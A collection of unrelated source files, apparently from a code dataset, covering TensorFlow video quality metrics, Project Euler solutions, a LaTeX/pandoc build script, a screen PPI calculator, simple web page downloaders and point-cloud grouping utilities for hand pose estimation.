ssim: 1-D Tensor, shape=(num_frames,)
"""
output = tf.cast(output, dtype=tf.int32)
target = tf.cast(target, dtype=tf.int32)
psnr = tf.image.psnr(output, target, max_val=255)
ssim = tf.image.ssim(output, target, max_val=255)
return psnr, ssim
def stack_data_given_key(predictions, key):
x = [p[key] for p in predictions]
x = np.stack(x, axis=0)
return x
def get_zipped_dataset_from_predictions(predictions):
"""Creates dataset from in-memory predictions."""
targets = stack_data_given_key(predictions, "targets")
outputs = stack_data_given_key(predictions, "outputs")
num_videos = len(targets)
targets_placeholder = tf.placeholder(targets.dtype, targets.shape)
outputs_placeholder = tf.placeholder(outputs.dtype, outputs.shape)
dataset = tf.data.Dataset.from_tensor_slices(
(targets_placeholder, outputs_placeholder))
iterator = dataset.make_initializable_iterator()
feed_dict = {targets_placeholder: targets,
outputs_placeholder: outputs}
return iterator, feed_dict, num_videos
def compute_one_decoding_video_metrics(iterator, feed_dict, num_videos):
"""Computes the average of all the metric for one decoding.
Args:
iterator: dataset iterator.
feed_dict: feed dict to initialize iterator.
num_videos: number of videos.
Returns:
all_psnr: 2-D Numpy array, shape=(num_samples, num_frames)
all_ssim: 2-D Numpy array, shape=(num_samples, num_frames)
"""
output, target = iterator.get_next()
metrics = psnr_and_ssim(output, target)
with tf.Session() as sess:
sess.run(tf.local_variables_initializer())
initalizer = iterator._initializer # pylint: disable=protected-access
if initalizer is not None:
sess.run(initalizer, feed_dict=feed_dict)
all_psnr, all_ssim = [], []
for i in range(num_videos):
print("Computing video: %d" % i)
psnr_np, ssim_np = sess.run(metrics)
all_psnr.append(psnr_np)
all_ssim.append(ssim_np)
all_psnr = np.array(all_psnr)
all_ssim = np.array(all_ssim)
return all_psnr, all_ssim
def reduce_to_best_decode(metrics, reduce_func):
"""Extracts the best-decode from the metrics according to reduce_func.
Args:
metrics: 3-D numpy array, shape=(num_decodes, num_samples, num_frames)
reduce_func: callable, np.argmax or np.argmin.
Returns:
best_metrics: 2-D numpy array, shape=(num_samples, num_frames).
"""
num_videos = metrics.shape[1]
# Take mean of the metric across the frames to approximate the video
# closest to the ground truth.
mean_across_frames = np.mean(metrics, axis=-1)
# For every sample, use the decode that has a maximum mean-metric.
best_decode_ind = reduce_func(mean_across_frames, axis=0)
return metrics[best_decode_ind, np.arange(num_videos), :]
def compute_all_metrics_statistics(all_results):
"""Computes statistics of metrics across multiple decodings.
Args:
all_results: dicf of 3-D numpy arrays.
Each array has shape=(num_decodes, num_samples, num_frames).
Returns:
statistics: dict of 1-D numpy arrays shape=(num_frames).
First the statistic (max/mean/std) is computed across the
decodes, then the mean is taken across num_samples.
"""
statistics = {}
all_metrics = all_results.keys()
for key in all_metrics:
values = all_results[key]
statistics[key + "_MEAN"] = np.mean(values, axis=0)
statistics[key + "_STD"] = np.std(values, axis=0)
statistics[key + "_MIN"] = reduce_to_best_decode(values, np.argmin)
statistics[key + "_MAX"] = reduce_to_best_decode(values, np.argmax)
# Computes mean of each statistic across the dataset.
for key in statistics:
statistics[key] = np.mean(statistics[key], axis=0)
return statistics
def compute_video_metrics_from_predictions(predictions):
"""Computes metrics from predictions.
Args:
predictions: list of list of dicts.
outer length: num_decodes, inner_length: num_samples
Returns:
statistics: dict of Tensors, key being the metric with each Tensor
having the shape (num_samples, num_frames).
"""
ssim_all_decodes, psnr_all_decodes = [], []
for single_decode in predictions:
args = get_zipped_dataset_from_predictions(single_decode)
psnr_single, ssim_single = compute_one_decoding_video_metrics(*args)
psnr_all_decodes.append(psnr_single)
ssim_all_decodes.append(ssim_single)
psnr_all_decodes = np.array(psnr_all_decodes)
ssim_all_decodes = np.array(ssim_all_decodes)
all_results = {"PSNR": psnr_all_decodes, "SSIM": ssim_all_decodes}
statistics = compute_all_metrics_statistics(all_results)
return statistics
def compute_video_metrics_from_png_files(
output_dirs, problem_name, video_length, frame_shape):
"""Computes the average of all the metric for one decoding.
This function assumes that all the predicted and target frames
have been saved on the disk and sorting them by name will result
to consecutive frames saved in order.
Args:
output_dirs: directory with all the saved frames.
problem_name: prefix of the saved frames usually name of the problem.
video_length: length of the videos.
frame_shape: shape of each frame in HxWxC format.
Returns:
Dictionary which contains the average of each metric per frame.
"""
ssim_all_decodes, psnr_all_decodes = [], []
for output_dir in output_dirs:
output_files, target_files = get_target_and_output_filepatterns(
output_dir, problem_name)
args = get_zipped_dataset_from_png_files(
output_files, target_files, video_length, frame_shape)
psnr_single, ssim_single = compute_one_decoding_video_metrics(*args)
psnr_all_decodes.append(psnr_single)
ssim_all_decodes.append(ssim_single)
psnr_all_decodes = np.array(psnr_all_decodes)
ssim_all_decodes = np.array(ssim_all_decodes)
all_results = {"PSNR": psnr_all_decodes, "SSIM": ssim_all_decodes}
statistics = compute_all_metrics_statistics(all_results)
return statistics, all_results
def compute_and_save_video_metrics(
output_dirs, problem_name, video_length, frame_shape):
"""Compute and saves the video metrics."""
statistics, all_results = compute_video_metrics_from_png_files(
output_dirs, problem_name, video_length, frame_shape)
for results, output_dir in zip(all_results, output_dirs):
save_results(results, output_dir, problem_name)
parent_dir = os.path.join(output_dirs[0], os.pardir)
final_dir = os.path.join(parent_dir, "decode")
tf.gfile.MakeDirs(parent_dir)
save_results(statistics, final_dir, problem_name)
``` |
{
"source": "jinlibao/MATLAB-files",
"score": 4
} |
#### File: Project.Euler/Answers.Python/4.py
```python
import math
def isPalindromic(number):
numberLength = int(math.ceil(math.log10(number)))
digits = []
while number > 0:
digits.append(number % 10)
number /= 10
i = 0
while i <= numberLength / 2:
if digits[i] != digits[numberLength-i-1]:
break
else:
i += 1
if i > numberLength / 2:
return True
else:
return False
def Palindromic(n):
f = [10 ** (n)-1, 10 ** (n)-1]
p = []
while f[0] >= 10 ** (n-1):
while f[1] >= 10 ** (n-1):
d = f[0] * f[1]
type = isPalindromic(d)
if type == True:
p.append(d)
# print f[0], f[1]
f[1] -= 1
else:
f[1] -= 1
f[0] -= 1
f[1] = f[0]
# print p
return max(p)
t = Palindromic(3)
print t
``` |
{
"source": "jinlibao/Pandoc-LaTeX-Templates",
"score": 3
} |
#### File: Notes/LaTeX/compile.py
```python
import os
import sys
import re
import time
import platform
__author__ = '<NAME>'
__create_date__ = '01/13/2017'
__last_update_date__ = '02/07/2018'
__copyright__ = "Copyright (c) 2018 Libao Jin"
__license__ = "MIT"
__version__ = "1.5.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Complete"
class Compiler():
'''Compile pandoc file to PDF, M$ Word documents etc.'''
folder = '.'
metadata = ''
filename = ''
source_file_body = 'body.tex'
source_file_main = 'main.tex'
output_file_main = 'main.pdf'
title = ''
last_name = 'Libao'
first_name = 'Jin'
email = '<EMAIL>'
author = r'{0} {1} (\\url{{{2}}})'.format(last_name, first_name, email)
date = '01/01/2017'
platform = ''
def __init__(self):
'''Initialization of class compile'''
self.folder = '.'
self.metadata = [('', '', '', '')]
self.platform = platform.system()
def get_metadata(self):
'''Get information from the folder structure and extract course information, and etc.'''
folder = self.folder
pathname = os.path.realpath(folder)
print(pathname)
print()
if self.platform == 'Windows':
string = r'([\w.-]+)\\([\w\d\s.-]+)\\LaTeX'
else:
string = '([\w.-]+)/([\w\d\s.-]+)/LaTeX'
pattern = re.compile(string)
self.metadata = re.findall(pattern, pathname)
print(self.metadata)
def generate_filename(self):
'''Generate filename for output file.'''
metadata = self.metadata[0]
print(metadata)
book = metadata[0]
doc_type = metadata[1].replace(' ', '.')
self.filename = '{0}.{1}_{2}.{3}.pdf'.format(book, doc_type, self.last_name, self.first_name)
def generate_title(self):
'''Generate title for the article/document.'''
metadata = self.metadata[0]
book = metadata[0].replace('.', ' ')
doc_type = metadata[1].replace('.', ' ')
self.title = '{0} {1}'.format(book, doc_type)
print(self.title)
def update_date(self):
t = time.localtime()
day = str(t.tm_mday).zfill(2)
month = str(t.tm_mon).zfill(2)
year = str(t.tm_year).zfill(4)
self.date = '{0}/{1}/{2}'.format(month, day, year)
def update_author_1(self):
'''Update author information in the source file to be compiled.'''
source_file = self.source_file_main
author = self.author
f = open(source_file, 'r')
content = f.read()
string = r'\\author{[\w\d\s]*}'
p = re.compile(string)
content = p.sub(r'\\author{{{0}}}'.format(author), content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def update_title(self):
'''Update title in the source file to be compiled.'''
source_file = self.source_file_main
title = self.title
f = open(source_file, 'r')
content = f.read()
string = r'\\title{[\w\d\s.-]*}'
p = re.compile(string)
content = p.sub(r'\\title{{{0}}}'.format(title), content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def heading_style_0(self):
'''Change heading style to not numberred heading.'''
source_file = self.source_file_body
f = open(source_file, 'r')
content = f.read()
string = r'\\section'
p = re.compile(string)
content = p.sub(r'\\textbf', content, count=1)
content = p.sub(r'\n\\textbf', content)
string = r'}\\label{[\w\d-]+}\n'
p = re.compile(string)
content = p.sub('.}', content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def heading_style_1(self):
'''Change heading style to not numberred heading.'''
source_file = self.source_file_body
f = open(source_file, 'r')
content = f.read()
string = r'\\section'
p = re.compile(string)
content = p.sub(r'\\textbf', content, count=1)
content = p.sub(r'\\newpage\n\\textbf', content)
string = r'}\\label{[\w\d-]+}\n'
p = re.compile(string)
content = p.sub('.}', content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def update_package(self, option):
'''Update title in the source file to be compiled.'''
source_file = self.source_file_main
f = open(source_file, 'r')
content = f.read()
if option == 'p':
string = r'^\\usepackage{fontspec}'
p = re.compile(string, re.MULTILINE)
content = p.sub(r'% \\usepackage{fontspec}', content)
string = r'^\\setmonofont\[Scale=0.8\]{Monaco}'
p = re.compile(string, re.MULTILINE)
content = p.sub(r'% \\setmonofont[Scale=0.8]{Monaco}', content)
elif option == 'x':
string = r'[% ]*\\usepackage{fontspec}'
p = re.compile(string)
content = p.sub(r'\\usepackage{fontspec}', content)
string = r'[% ]*\\setmonofont\[Scale=0.8\]{Monaco}'
p = re.compile(string)
content = p.sub(r'\\setmonofont[Scale=0.8]{Monaco}', content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def compile_pdflatex(self):
'''Compile files by calling pandoc, pdflatex and rm commands to keep the file structure organized.'''
if self.platform == 'Windows':
path = '..\\' + self.filename
else:
path = '../' + self.filename
if os.path.exists(path):
os.remove(path)
if self.platform == 'Windows':
os.system('pdflatex -quiet {0}'.format(self.source_file_main))
os.system('pdflatex -quiet {0}'.format(self.source_file_main))
os.system('del *.log *.aux *.idx *.out *.toc *~')
os.rename('{0}'.format(self.output_file_main), path)
else:
os.system('pdflatex -interaction=batchmode {0}'.format(self.source_file_main))
os.system('pdflatex -interaction=batchmode {0}'.format(self.source_file_main))
os.system('rm *.log *.aux *.idx *.out *.toc *~')
os.rename('{0}'.format(self.output_file_main), path)
def compile_xelatex(self):
'''Compile files by calling pandoc, pdflatex and rm commands to keep the file structure organized.'''
if self.platform == 'Windows':
path = '..\\' + self.filename
else:
path = '../' + self.filename
if os.path.exists(path):
os.remove(path)
if self.platform == 'Windows':
os.system('xelatex -quiet {0}'.format(self.source_file_main))
os.system('xelatex -quiet {0}'.format(self.source_file_main))
os.system('del *.log *.aux *.idx *.out *.toc *~')
os.rename('{0}'.format(self.output_file_main), path)
else:
os.system('xelatex -interaction=batchmode {0}'.format(self.source_file_main))
os.system('xelatex -interaction=batchmode {0}'.format(self.source_file_main))
os.system('rm *.log *.aux *.idx *.out *.toc *~')
os.rename('{0}'.format(self.output_file_main), path)
def generate_source_file_body(self):
'''Generate source file body.tex from body.pdc by using pandoc'''
os.system('pandoc -f markdown -o body.tex body.pdc')
def run(self):
'''By a series commands to compile the tex file and clean up the unnecessary files.'''
self.get_metadata()
self.generate_filename()
self.generate_title()
self.generate_source_file_body()
if len(sys.argv) == 1:
print('Heading Style: Normal.')
self.update_author_1()
elif sys.argv[1] == '0':
print('Heading Style: Boldface.')
self.heading_style_0()
self.update_author_1()
elif sys.argv[1] == '1':
print('Heading Style: Boldface.')
self.heading_style_1()
self.update_author_1()
else:
print('Error.')
self.update_title()
if len(sys.argv) <= 2:
self.update_package('x')
self.compile_xelatex()
self.update_package('p')
elif sys.argv[2] == 'p':
self.compile_pdflatex()
self.update_package('p')
elif sys.argv[2] == 'x':
self.update_package('x')
self.compile_xelatex()
self.update_package('p')
if __name__ == '__main__':
compiler = Compiler()
compiler.run()
``` |
{
"source": "jinlibao/toolkits",
"score": 4
} |
#### File: Python/Computer.Performance/ppi.py
```python
import math
__author__ = '<NAME>'
__date__ = 'July 21, 2015'
class Screen():
'''
Class: A Digital Screen
'''
def __init__(self):
'Constructor'
self.ppi = None
def __init__(self, **screen_info):
'Constructor'
self.width = screen_info['width']
self.height = screen_info['height']
self.size = screen_info['size']
def compute_ppi(self, width, height, size):
ppi = math.sqrt(width ** 2 + height ** 2) / size
print('-' * 40)
print('Screen size: {0:.1f} inches'.format(size))
print('Resolution')
print('width: {0:d}'.format(width))
print('height: {0:d}'.format(height))
print('ppi: {0:.1f}'.format(ppi))
def set_ppi(self):
self.ppi = math.sqrt(self.width ** 2 + self.height ** 2) / self.size
def get_width(self):
'Get width.'
return self.width
def get_height(self):
'Get height.'
return self.height
def get_size(self):
'Get size.'
return self.size
def get_ppi(self):
'Get ppi.'
return self.ppi
def get_screen_info(self):
'Get screen detailed info.'
print('-' * 40)
print('Screen size: {0:.1f} inches'.format(self.size))
print('Resolution')
print('width: {0:d}'.format(self.width))
print('height: {0:d}'.format(self.height))
print('ppi: {0:.1f}'.format(self.ppi))
if __name__ == '__main__':
width = 1280
height = 720
size = 5.5
screen_info = {'width': width, 'height': height, 'size': size}
s = Screen(**screen_info)
s.set_ppi()
s.get_screen_info()
s.compute_ppi(1920, 1080, 5.7)
s.compute_ppi(2560, 1440, 5.7)
s.compute_ppi(1366, 768, 13.6)
s.compute_ppi(1920, 1080, 5.5)
s.compute_ppi(1280, 768, 5)
s.compute_ppi(1920, 1080, 4.95)
s.compute_ppi(1136, 640, 4)
s.compute_ppi(2560, 1600, 13.3)
s.compute_ppi(2880, 1800, 15.4)
```
#### File: Project.Euler/Answers.Python/12_old.py
```python
import math
__author__ = '<NAME>'
__date__ = 'July 13, 2015'
def AccumulateSumSequence(n):
seq = []
i = 1
currentValue = 0
while i <= n:
currentValue += i
seq.append(currentValue)
i += 1
return seq
def AccumulateSumGenerator(n):
number = 0
i = 1
while i <= n:
number += i
i += 1
return number
def Factorization(n):
currentFactor = 1
factors = []
while currentFactor <= n // 2:
if n % currentFactor == 0:
factors.append(currentFactor)
currentFactor += 1
factors.append(n)
return factors
def SeqFactors(n):
seq = AccumulateSumSequence(n)
numfactors = []
for i in seq:
factors = Factorization(i)
numfactors.append([i,len(factors),factors])
return numfactors
def NumberFactors(LengthBound):
length = 0
n = 1
while length <= LengthBound:
number = AccumulateSumGenerator(n)
factors = Factorization(number)
length = len(factors)
n += 1
numberInfo = [number, len(factors), factors]
return numberInfo
def test1():
s = SeqFactors(10)
for i in s:
print(i)
def solution():
result = NumberFactors(500)
print(result)
#test1()
solution()
```
#### File: Project.Euler/Answers.Python/14.py
```python
__author__ = '<NAME>'
__date__ = 'July 13, 2015'
def isEven(n):
if n % 2 == 0:
return True
else:
return False
def collatzTransform(n):
if isEven(n):
n = n // 2
else:
n = 3 * n + 1
return n
def CollatzSequence(startNumber):
collatzSeq = [startNumber]
transformedNumber = collatzTransform(startNumber)
collatzSeq.append(transformedNumber)
while transformedNumber != 1:
transformedNumber = collatzTransform(transformedNumber)
collatzSeq.append(transformedNumber)
return [startNumber, len(collatzSeq), collatzSeq]
def longestCollatzStartNumber(UpperBound):
currentStartNumber = 3
currentMaxStartNumber = currentStartNumber
currentMaxLength = 0
longestCollatzSeq = 0
while currentStartNumber < UpperBound:
ccs = CollatzSequence(currentStartNumber)
if currentMaxLength < ccs[1]:
currentMaxLength = ccs[1]
currentMaxStartNumber = ccs[0]
currentStartNumber += 1
lcs = CollatzSequence(currentMaxStartNumber)
return lcs
def test1():
cs = CollatzSequence(13)
print(cs)
def test2():
lcs = longestCollatzStartNumber(1000000)
print(lcs)
test2()
```
#### File: Project.Euler/Answers.Python/19.py
```python
__author__ = '<NAME>'
__date__ = 'July 17, 2015'
def isLeapYear(year):
if year % 400 == 0:
return True
elif year % 100 != 0 and year % 4 == 0:
return True
else:
return False
def daysInYear(date):
year, month, day = date
months = range(1, month)
days = 0
for m in months:
days += daysOfMonth(year, m)
days += day
return days
def daysInYearReversed(date):
days = daysOfYear(date[0]) - daysInYear(date)
return days
def daysOfYear(year):
if isLeapYear(year):
days = 366
else:
days = 365
return days
def daysOfMonth(year, month):
if month == 1\
or month == 3\
or month == 5\
or month == 7\
or month == 8\
or month == 10\
or month == 12:
days = 31
elif month == 2:
if isLeapYear(year):
days = 29
else:
days = 28
else:
days = 30
return days
def countDays(dateStart, dateEnd):
yearStart, monthStart, dayStart = dateStart
yearEnd, monthEnd, dayEnd = dateEnd
years = range(yearStart+1, yearEnd)
days = daysInYearReversed(dateStart)
days += daysInYear(dateEnd)
for y in years:
days += daysOfYear(y)
return days
def whichDay(date):
dateFrom = (1900, 1, 1)
days = countDays(dateFrom, date)
remainder = days % 7
if remainder == 0:
day = 'Monday'
elif remainder == 1:
day = 'Tuesday'
elif remainder == 2:
day = 'Wednesday'
elif remainder == 3:
day = 'Thursday'
elif remainder == 4:
day = 'Friday'
elif remainder == 5:
day = 'Saturday'
elif remainder == 6:
day = 'Sunday'
return day
def directMethod():
dateStart = (1901, 1, 1)
dateEnd = (2000, 12, 31)
years = range(dateStart[0], dateEnd[0]+1)
months = range(1, 13)
Sundays = []
for y in years:
for m in months:
firstOfMonth = (y, m, 1)
if whichDay(firstOfMonth) == 'Sunday':
Sundays.append(firstOfMonth)
return (len(Sundays), Sundays)
def test():
#dateStart = (1993, 7, 17)
#dateEnd = (2015, 7, 17)
#days = countDays(dateStart, dateEnd)
#print(days)
#day = whichDay(dateEnd)
#print(day)
result = directMethod()
print(result)
test()
```
#### File: Project.Euler/Answers.Python/28.py
```python
__author__ = '<NAME>'
__date__ = 'July 18, 2015'
def list2stringList(list):
stringList = []
for l in list:
for s in l:
stringList.append(s)
return stringList
def direction(UPPER_BOUND):
orientation = ['R', 'D', 'L', 'U']
rSeq = list(range(1, UPPER_BOUND+2, 2))
dSeq = list(range(1, UPPER_BOUND+2, 2))
lSeq = list(range(2, UPPER_BOUND+2, 2))
uSeq = list(range(2, UPPER_BOUND+2, 2))
#print(rSeq, dSeq, lSeq, uSeq)
i = 0
directions = [rSeq[i]*orientation[0]]
index = rSeq[i]
while index < UPPER_BOUND ** 2:
directions.append(dSeq[i] * orientation[1])
directions.append(lSeq[i] * orientation[2])
directions.append(uSeq[i] * orientation[3])
directions.append(rSeq[i+1] * orientation[0])
index += dSeq[i] + lSeq[i] + uSeq[i] + rSeq[i+1]
i += 1
directions = list2stringList(directions)
#print(directions)
return directions
def route(UPPER_BOUND):
directions = direction(UPPER_BOUND)
point = (UPPER_BOUND+1) // 2
currentPoint = (point-1, point-1)
pointInfo = []
pointInfo.append((1, currentPoint))
for i,e in enumerate(directions[0:-1]):
if e == 'R':
currentPoint = (currentPoint[0], currentPoint[1] + 1)
pointInfo.append((i+2, currentPoint))
elif e == 'D':
currentPoint = (currentPoint[0] + 1, currentPoint[1])
pointInfo.append((i+2, currentPoint))
elif e == 'L':
currentPoint = (currentPoint[0], currentPoint[1] - 1)
pointInfo.append((i+2, currentPoint))
elif e == 'U':
currentPoint = (currentPoint[0] - 1, currentPoint[1])
pointInfo.append((i+2, currentPoint))
return pointInfo
def matrix(UPPER_BOUND):
matrix = [[None for i in range(UPPER_BOUND)] for i in range(UPPER_BOUND)]
pointInfo = route(UPPER_BOUND)
for p in pointInfo:
matrix[p[1][0]][p[1][1]] = p[0]
for i in matrix:
print(i)
return matrix
def size(matrix):
rowLength = len(matrix)
colLength = len(matrix[0])
sizeOfMatrix = (rowLength, colLength)
return sizeOfMatrix
def diagonalSum(matrix):
sizeOfMatrix = size(matrix)
index = range(sizeOfMatrix[0])
dSum = 0
for i in index:
dSum += matrix[i][i]
for i in index:
dSum += matrix[i][-(i+1)]
dSum -= 1
return dSum
def solution():
m = matrix(1001)
ds = diagonalSum(m)
print(ds)
solution()
```
#### File: Project.Euler/Answers.Python/52.py
```python
__author__ = '<NAME>'
__date__ = 'July 18, 2015'
def number2digits(number):
string = str(number)
digits = []
for s in string:
digits.append(int(s))
return sorted(digits)
def hasSameDigits(number1, number2):
digits1 = number2digits(number1)
digits2 = number2digits(number2)
if digits1 == digits2:
return True
else:
return False
def multiplesOfNumber(number, n):
times = range(1, n+1)
multiples = []
for i in times:
multiple = number * i
multiples.append(multiple)
return multiples
def isQualified(number, n):
multiples = multiplesOfNumber(number, n)
sameDigits = []
for m in multiples:
sameDigits.append(hasSameDigits(number, m))
if all(sameDigits):
return True
else:
return False
def permutedMultiples(n):
number = 1
while not isQualified(number, n):
number += 1
pMultiple = multiplesOfNumber(number, n)
return (number, pMultiple)
def solution():
number = permutedMultiples(2)
print(number)
solution()
```
#### File: Project.Euler/Answers.Python/55.py
```python
__author__ = '<NAME>'
__date__ = 'July 17, 2015'
def rotateDigits(number):
string = str(number)
rotatedString = string[::-1]
rotatedNumber = int(rotatedString)
return rotatedNumber
def isSymmetrical(number):
rotatedNumber = rotateDigits(number)
if rotatedNumber == number:
return True
else:
return False
def isLychrelNumber(number):
iterTimes = 0
rotatedNumber = rotateDigits(number)
number = number + rotatedNumber
while iterTimes < 50:
if isSymmetrical(number):
return False
else:
rotatedNumber = rotateDigits(number)
number = number + rotatedNumber
iterTimes += 1
if iterTimes >= 50:
return True
def LychrelNumbers(UPPER_BOUND):
number = 1
lNumbers = []
while number < UPPER_BOUND:
if isLychrelNumber(number):
lNumbers.append(number)
number += 1
else:
number += 1
numberOfLychrelNumbers = len(lNumbers)
return (numberOfLychrelNumbers, lNumbers)
def solution():
UPPER_BOUND = 10000
LN_Info = LychrelNumbers(UPPER_BOUND)
print(LN_Info)
solution()
```
#### File: Crawler.Python/old/PEC2.py
```python
import urllib
import urllib2
def PEC(number):
url = "https://projecteuler.net/"
data = {'problem': number}
request = urllib2.request(url, data)
response = urllib2.urlopen(request)
result = response.read()
ext = '.html'
filename = str(number) + ext
f = open(filename, 'w')
f.write(result)
print(filename + " downloaded")
f.close()
numbers = range(1, 505)
for i in numbers:
PEC(i)
```
#### File: Crawler.Python/old/PEC.py
```python
import urllib.parse
import urllib.request
def PEC(number):
basic_url = "https://projecteuler.net/problem="
url = basic_url + str(number)
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
result = response.readall().decode('utf-8')
loc = '../Problems/pages/'
ext = '.html'
filename = loc + str(number) + ext
f = open(filename, 'w')
f.write(result)
print(filename + " downloaded")
f.close()
numbers = range(465, 505)
for i in numbers:
PEC(i)
``` |
{
"source": "JinliEmma/HandPointNet",
"score": 2
} |
#### File: HandPointNet/train_eval/utils.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
# import pdb
def group_points(points, opt):
# group points using knn and ball query
# points: B * 1024 * 6
cur_train_size = len(points)
inputs1_diff = points[:, :, 0:3].transpose(1, 2).unsqueeze(1).expand(cur_train_size, opt.sample_num_level1, 3, opt.SAMPLE_NUM) \
- points[:, 0:opt.sample_num_level1, 0:3].unsqueeze(-1).expand(
cur_train_size, opt.sample_num_level1, 3, opt.SAMPLE_NUM) # B * 512 * 3 * 1024
inputs1_diff = torch.mul(
inputs1_diff, inputs1_diff) # B * 512 * 3 * 1024
inputs1_diff = inputs1_diff.sum(2) # B * 512 * 1024
# dists: B * 512 * 64; inputs1_idx: B * 512 * 64
dists, inputs1_idx = torch.topk(
inputs1_diff, opt.knn_K, 2, largest=False, sorted=False)
# ball query
invalid_map = dists.gt(opt.ball_radius) # B * 512 * 64
for jj in range(opt.sample_num_level1):
inputs1_idx[:, jj, :][invalid_map[:, jj, :]] = jj
idx_group_l1_long = inputs1_idx.view(cur_train_size, opt.sample_num_level1*opt.knn_K, 1).expand(
cur_train_size, opt.sample_num_level1*opt.knn_K, opt.INPUT_FEATURE_NUM)
inputs_level1 = points.gather(1, idx_group_l1_long).view(
cur_train_size, opt.sample_num_level1, opt.knn_K, opt.INPUT_FEATURE_NUM) # B*512*64*6
inputs_level1_center = points[:, 0:opt.sample_num_level1, 0:3].unsqueeze(
2) # B*512*1*3
inputs_level1[:, :, :, 0:3] = inputs_level1[:, :, :, 0:3] - \
inputs_level1_center.expand(
cur_train_size, opt.sample_num_level1, opt.knn_K, 3)
inputs_level1 = inputs_level1.unsqueeze(
1).transpose(1, 4).squeeze(4) # B*6*512*64
inputs_level1_center = inputs_level1_center.contiguous(
).view(-1, 1, opt.sample_num_level1, 3).transpose(1, 3) # B*3*512*1
return inputs_level1, inputs_level1_center
# inputs_level1: B*INPUT_FEATURE_NUM*sample_num_level1*knn_K, inputs_level1_center: B*3*sample_num_level1*1
def group_points_2(points, sample_num_level1, sample_num_level2, knn_K, ball_radius):
# group points using knn and ball query
# points: B*(3+128)*512
cur_train_size = points.size(0)
inputs1_diff = points[:, 0:3, :].unsqueeze(1).expand(cur_train_size, sample_num_level2, 3, sample_num_level1) \
- points[:, 0:3, 0:sample_num_level2].transpose(1, 2).unsqueeze(-1).expand(
cur_train_size, sample_num_level2, 3, sample_num_level1) # B * 128 * 3 * 512
inputs1_diff = torch.mul(inputs1_diff, inputs1_diff) # B * 128 * 3 * 512
inputs1_diff = inputs1_diff.sum(2) # B * 128 * 512
# dists: B * 128 * 64; inputs1_idx: B * 128 * 64
dists, inputs1_idx = torch.topk(
inputs1_diff, knn_K, 2, largest=False, sorted=False)
# ball query
# B * 128 * 64, invalid_map.float().sum()
invalid_map = dists.gt(ball_radius)
# pdb.set_trace()
for jj in range(sample_num_level2):
inputs1_idx.data[:, jj, :][invalid_map.data[:, jj, :]] = jj
idx_group_l1_long = inputs1_idx.view(cur_train_size, 1, sample_num_level2*knn_K).expand(
cur_train_size, points.size(1), sample_num_level2*knn_K)
inputs_level2 = points.gather(2, idx_group_l1_long).view(
cur_train_size, points.size(1), sample_num_level2, knn_K) # B*131*128*64
inputs_level2_center = points[:, 0:3, 0:sample_num_level2].unsqueeze(
3) # B*3*128*1
inputs_level2[:, 0:3, :, :] = inputs_level2[:, 0:3, :, :] - \
inputs_level2_center.expand(
cur_train_size, 3, sample_num_level2, knn_K) # B*3*128*64
return inputs_level2, inputs_level2_center
# inputs_level2: B*131*sample_num_level2*knn_K, inputs_level2_center: B*3*sample_num_level2*1
``` |
{
"source": "JINLINBI/skynet",
"score": 3
} |
#### File: excel/json/check.py
```python
import json
import os
import re
data = {}
COLOR_RED = "\033[31m"
COLOR_GREEN = "\033[32m"
COLOR_YELLOW = "\033[33m"
COLOR_BRIGHT_MAGENTA = "\033[95m"
COLOR_BRIGHT_YELLOW = "\033[93m"
COLOR_CLEAR = "\033[0m"
EXCEL_FILES_ROOT = "../"
# add support type field here
support_type = {
"number",
"integer",
"string",
"int[]",
}
# add support name field here
support_col = {
"name",
"type",
"index",
}
def check_support_type(type):
return type in support_type
def check_support_col(name):
return name in support_col
col_name_set = set()
def check_col_repeated(data, reset = False):
global col_name_set
if reset:
col_name_set = set()
if data in col_name_set:
return True
col_name_set.add(data)
return False
def check_col_require(data):
if "name" not in data:
print(COLOR_RED + "missing index \"name\"!" + COLOR_CLEAR)
return False
if "type" not in data:
print(COLOR_RED + "missing index \"type\"!" + COLOR_CLEAR)
return False
return True
def check_fields_field(data):
if data == None:
return False
check_col_repeated("", True)
for col in data:
check_col_require(col)
for k, item in col.items():
if not check_support_col(k):
print(COLOR_YELLOW + "name field: \"" + k + "\" is" + " not suppported" + COLOR_CLEAR)
continue
elif k == "name" and check_col_repeated(item):
print(COLOR_RED + "name field: \"" + item + "\" repeated!" + COLOR_CLEAR)
elif k == "type" and not check_support_type(item):
print(COLOR_YELLOW + "type field: \"" + item + "\" is " + "not suppported." + COLOR_CLEAR)
continue
def check_txt_files(filename):
m = re.search('\.txt$', filename)
if m is None:
return
print(COLOR_BRIGHT_YELLOW + "checking txt file: " + filename + COLOR_CLEAR)
check_col_repeated("", True)
with open(filename, 'r') as f:
for line in f.readlines():
words = line.split('\t')
for word in words:
print("word: " + word)
# check repeat id
if check_col_repeated(words[0]):
print(COLOR_RED + "id " + COLOR_BRIGHT_YELLOW + word[0] + COLOR_RED + " repeated!" + COLOR_CLEAR)
def check_files_field(data):
if data == None:
return
for filename in data:
check_txt_files(EXCEL_FILES_ROOT + filename + ".txt")
def check_json_file(filename):
m = re.search('\.json$', filename)
if m is None:
return
print(COLOR_GREEN + "checking json file: " + filename + COLOR_CLEAR)
data = {}
with open(filename, 'r') as f:
data = json.load(f)
check_fields_field(data["fields"])
check_files_field(data["files"])
def walk_dir_func(func, dirt, exclude = False):
for root, dirs, files in os.walk(EXCEL_FILES_ROOT):
# get files root dirs
print("dir: " + root)
hit = False
if exclude and root != EXCEL_FILES_ROOT + dirt:
hit = True
elif not exclude and root == EXCEL_FILES_ROOT + dirt:
hit = True
if hit:
for file in files:
print("file: " + os.path.join(root, file))
func(os.path.join(root, file))
if __name__ == "__main__":
# check_json_file("item_list.json")
walk_dir_func(check_json_file, "json")
``` |
{
"source": "jinlinyi/SparsePlanes",
"score": 2
} |
#### File: modeling/camera_net/camera_head.py
```python
import torch
import fvcore.nn.weight_init as weight_init
from torch import nn
from torch.nn import functional as F
from detectron2.utils.registry import Registry
__all__ = ["build_camera_head", "PlaneRCNNCameraHead", "CAMERA_HEAD_REGISTRY"]
CAMERA_HEAD_REGISTRY = Registry("CAMERA_HEAD")
CAMERA_HEAD_REGISTRY.__doc__ = """
